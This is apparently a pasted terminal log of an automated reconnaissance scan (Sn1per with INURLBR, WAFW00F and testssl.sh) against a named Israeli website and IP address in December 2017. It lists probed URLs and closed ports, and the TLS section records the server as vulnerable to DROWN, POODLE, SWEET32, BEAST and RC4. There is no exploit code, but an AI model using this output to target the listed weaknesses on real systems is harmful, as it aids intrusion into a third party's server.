- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 60 / 63 [1;37m][0;37m-[23:38:54][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-2/314/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 61 / 63 [1;37m][0;37m-[23:38:58][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-8/303/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 62 / 63 [1;37m][0;37m-[23:39:02][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-3/316/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / - / , ISP: [1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m[ INFO ] [ Shutting down ][0m
- [1;37m[ INFO ] [ End of process INURLBR at [30-12-2017 23:39:02][0m
- [1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 1 ][0m
- [1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-doctorarik.co.il.txt ][0m
- [1;37m|_________________________________________________________________________________________[0m
- http://www.doctorarik.co.il/20170629102001-nyv-472.html
- [1;37m\_________________________________________________________________________________________/[0m
- [91m + -- --=[Port 110 closed... skipping.[0m
- [91m + -- --=[Port 111 closed... skipping.[0m
- [91m + -- --=[Port 135 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 161 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [93m + -- --=[Port 443 opened... running tests...[0m
- [92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://doctorarik.co.il
- [92m + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +[0m
- [92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
- [1m[34mhttps://doctorarik.co.il[0m [404 Not Found] [1m[37mCountry[0m[[37mISRAEL[0m][[1m[31mIL[0m], [1m[37mHTTPServer[0m[[1m[36mMicrosoft-HTTPAPI/2.0[0m], [1m[37mIP[0m[[37m62.219.91.10[0m], [1m[37mMicrosoft-HTTPAPI[0m[[1m[32m2.0[0m], [1m[37mTitle[0m[[1m[33mNot Found[0m]
- [92m + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +[0m
- Version: [32m1.11.10-static[0m
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- [0m
- Testing SSL server [32mdoctorarik.co.il[0m on port [32m443[0m using SNI name [32mdoctorarik.co.il[0m
- [1;34mTLS Fallback SCSV:[0m
- Server [31mdoes not[0m support TLS Fallback SCSV
- [1;34mTLS renegotiation:[0m
- [32mSecure[0m session renegotiation supported
- [1;34mTLS Compression:[0m
- Compression [32mdisabled[0m
- [1;34mHeartbleed:[0m
- TLS 1.2 [32mnot vulnerable[0m to heartbleed
- TLS 1.1 [32mnot vulnerable[0m to heartbleed
- TLS 1.0 [32mnot vulnerable[0m to heartbleed
- [1;34mSupported Server Cipher(s):[0m
- [32mPreferred[0m [33mTLSv1.0[0m [32m128[0m bits AES128-SHA
- Accepted [33mTLSv1.0[0m [32m256[0m bits AES256-SHA
- Accepted [33mTLSv1.0[0m [32m128[0m bits [33mRC4-SHA [0m
- Accepted [33mTLSv1.0[0m [32m112[0m bits [33mDES-CBC3-SHA [0m
- Accepted [33mTLSv1.0[0m [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted [33mTLSv1.0[0m [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted [33mTLSv1.0[0m [32m128[0m bits [33mRC4-MD5 [0m
- [32mPreferred[0m [31mSSLv3[0m [32m128[0m bits [33mRC4-SHA [0m
- Accepted [31mSSLv3[0m [32m112[0m bits [31mDES-CBC3-SHA [0m
- Accepted [31mSSLv3[0m [32m128[0m bits [33mRC4-MD5 [0m
- [32mPreferred[0m [31mSSLv2[0m [32m128[0m bits [33mRC4-MD5 [0m
- Accepted [31mSSLv2[0m [32m112[0m bits [33mDES-CBC3-MD5 [0m
- [1;34mSSL Certificate:[0m
- Signature Algorithm: [32msha256WithRSAEncryption[0m
- RSA Key Strength: 2048
- Subject: negba.dtnt.info
- Altnames: DNS:negba.dtnt.info
- Issuer: thawte DV SSL CA - G2
- Not valid before: [32mFeb 5 00:00:00 2017 GMT[0m
- Not valid after: [32mMar 7 23:59:59 2018 GMT[0m
- [1m
- ###########################################################
- testssl 2.9dev from [m[1mhttps://testssl.sh/dev/[m
- [1m
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ [m[1mhttps://testssl.sh/bugs/[m
- [1m
- ###########################################################[m
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- [7m Start 2017-12-30 23:40:22 -->> 62.219.91.10:443 (doctorarik.co.il) <<--[m
- rDNS (62.219.91.10): cust-62-219-91-10.cust.bezeqint.net.
- Service detected: Couldn't determine what's running on port 443, assuming no HTTP service => skipping all HTTP checks
- [1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
- [1m SSLv2 [m[1;31moffered (NOT ok), also VULNERABLE to DROWN attack[m -- 2 ciphers
- [1m SSLv3 [m[0;31moffered (NOT ok)[m
- [1m TLS 1 [moffered
- [1m TLS 1.1 [mnot offered
- [1m TLS 1.2 [m[0;33mnot offered[m[0;33m -- strange, server closed TCP connection [m
- [1m TLS 1.3 [mnot offered
- [1m SPDY/NPN [mnot offered
- [1m HTTP2/ALPN [mnot offered
- [1m[4m Testing ~standard cipher categories [m
- [1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
- [1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
- [1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
- [1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
- [1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;31moffered (NOT ok)[m
- [1m Triple DES Ciphers (Medium) [m[0;33moffered[m
- [1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
- [1m Strong encryption (AEAD ciphers) [m[0;33mnot offered[m
- [1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
- [0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-SHA ECDHE-RSA-AES128-SHA
- [1m Elliptic curves offered: [m[0;32mprime256v1[m [0;32msecp384r1[m
- [1m[4m Testing server preferences [m
- [1m Has server cipher order? [m[1;32myes (OK)[m
- [1m Negotiated protocol [mTLSv1
- [1m Negotiated cipher [m[1;33mAES128-SHA[m
- [1m Cipher order[m
- SSLv3: RC4-SHA DES-CBC3-SHA RC4-MD5
- TLSv1: AES128-SHA AES256-SHA RC4-SHA DES-CBC3-SHA ECDHE-RSA-AES128-SHA
- ECDHE-RSA-AES256-SHA RC4-MD5
- [1m[4m Testing server defaults (Server Hello) [m
- [1m TLS extensions (standard) [m"status request/#5" "renegotiation info/#65281"
- [1m Session Ticket RFC 5077 hint [m(no lifetime advertised)
- [1m SSL Session ID support [myes
- [1m Session Resumption [mTickets: yes, ID: yes
- [1m TLS clock skew[m -4 sec from localtime
- [1m Signature Algorithm [m[0;32mSHA256 with RSA[m
- [1m Server key size [mRSA 2048 bits
- [1m Fingerprint / Serial [mSHA1 0BB7413C950A275DF33377BF39362D6DB2075E5C / 239E30BA064D957DE0A47B7B0508C258
- SHA256 D4B63BA4B0EB88CB74B56246F047B7949CC3B770AFF2B9F510D98F9A51334E1A
- [1m Common Name (CN) [m[3mnegba.dtnt.info[m
- [1m subjectAltName (SAN) [m[3mnegba.dtnt.info [m
- [1m Issuer [m[3mthawte DV SSL CA - G2[m ([3mthawte, Inc.[m from [3mUS[m)
- [1m Trust (hostname) [m[0;31mcertificate does not match supplied URI[m (same w/o SNI)
- [1m Chain of trust[m [0;32mOk [m[0;35m[m
- [1m EV cert[m (experimental) no
- [1m Certificate Expiration [m[0;32m66 >= 60 days[m (2017-02-04 19:00 --> 2018-03-07 18:59 -0500)
- [1m # of certificates provided[m 2
- [1m Certificate Revocation List [mhttp://tn.symcb.com/tn.crl
- [1m OCSP URI [mhttp://tn.symcd.com
- [1m OCSP stapling [m[0;32moffered[m
- [1m OCSP must staple [mno
- [1m DNS CAA RR[m (experimental) [1;33mnot offered[m
- [1m Certificate Transparency [m[0;32myes[m (certificate extension)
- [1m[4m Testing vulnerabilities [m
- [1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m, no heartbeat extension
- [1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
- [1m Ticketbleed[m (CVE-2016-9244), experiment. -- (applicable only for HTTPS)
- [1m ROBOT [m[1;32mnot vulnerable (OK)[m
- [1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
- [1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
- [1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m (not using HTTP anyway)
- [1m POODLE, SSL[m (CVE-2014-3566) [0;31mVULNERABLE (NOT ok)[m, uses SSLv3+CBC (check TLS_FALLBACK_SCSV mitigation below)
- [1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;31mDowngrade attack prevention NOT supported and vulnerable to POODLE SSL[m
- [1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;33mVULNERABLE[m, uses 64 bit block ciphers
- [1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
- [1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;31mVULNERABLE (NOT ok), SSLv2 offered with 2 ciphers[m
- Make sure you don't use this certificate elsewhere, see:
- https://censys.io/ipv4?q=D4B63BA4B0EB88CB74B56246F047B7949CC3B770AFF2B9F510D98F9A51334E1A
- [1m LOGJAM[m (CVE-2015-4000), experimental [0;32mnot vulnerable (OK):[m no DH EXPORT ciphers, no DH key detected
- [1m BEAST[m (CVE-2011-3389) SSL3: [0;33mDES-CBC3-SHA [m
- TLS1: [0;33mAES128-SHA AES256-SHA
- DES-CBC3-SHA
- ECDHE-RSA-AES128-SHA
- ECDHE-RSA-AES256-SHA [m
- [0;33mVULNERABLE[m -- and no higher protocols as mitigation supported
- [1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
- [1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;31mVULNERABLE (NOT ok): [m[0;31mRC4-SHA RC4-MD5
- RC4-MD5 [m
- [1m[4m Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
- x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
- xc013 ECDHE-RSA-AES128-SHA ECDH[0;32m 256[m AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
- x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
- x05 RC4-SHA RSA RC4 128 TLS_RSA_WITH_RC4_128_SHA
- x04 RC4-MD5 RSA RC4 128 TLS_RSA_WITH_RC4_128_MD5
- x010080 RC4-MD5 RSA RC4 128 SSL_CK_RC4_128_WITH_MD5
- x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
- x0700c0 DES-CBC3-MD5 RSA 3DES 168 SSL_CK_DES_192_EDE3_CBC_WITH_MD5
- Could not determine the protocol, only simulating generic clients.
- [1m[4m Running client simulations via sockets [m
- Java 6u45 TLSv1.0 AES128-SHA
- Java 7u25 TLSv1.0 AES128-SHA
- Java 8u31 TLSv1.0 AES128-SHA
- OpenSSL 1.0.1l TLSv1.0 AES128-SHA
- OpenSSL 1.0.2e TLSv1.0 AES128-SHA
- [7m Done 2017-12-30 23:48:37 [ 498s] -->> 62.219.91.10:443 (doctorarik.co.il) <<--[m
- #######################################################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement